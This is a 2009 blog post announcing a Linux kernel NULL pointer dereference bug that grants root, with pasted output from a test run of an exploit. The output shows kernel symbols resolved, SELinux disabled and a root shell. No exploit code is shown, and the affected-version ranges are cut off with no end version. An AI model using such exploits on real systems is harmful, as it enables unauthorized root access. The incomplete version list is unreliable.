Showing posts from August, 2009

Linux kernel bug (2009)

A fairly serious bug has been found in the Linux kernel, caused by a NULL pointer dereference. If exploited, it can go as far as getting root... osram........ The system would do anything for you..

Almost all kernels from version 2.4 through 2.6 are affected by this bug:
- Linux 2.4, from 2.4.4 up to and including
- Linux 2.6, from 2.6.0 up to and including

Exploit testing:

$ ./script
[+] Resolved selinux_enforcing to 0xffffffff80bb4348
[+] Resolved selinux_enabled to 0xffffffff80bb4344
[+] Resolved security_ops to 0xffffffff80bb2ae0
[+] Resolved default_security_ops to 0xffffffff808e55a0
[+] Resolved sel_read_enforce to 0xffffffff803e16e0
[+] Resolved audit_enabled to 0xffffffff80ae2ec4
[+] Resolved commit_creds to 0xffffffff8026d3f0
[+] Resolved prepare_kernel_cred to 0xffffffff8026d040
[+] got ring0!
[+] detected 2.6 style 4k stacks
sh: mplayer: not found
[+] Disabled security of : nothing, what an insecure machine!
[+] Got root!
# id
uid=0(root) gid=0(root)

Original bug report: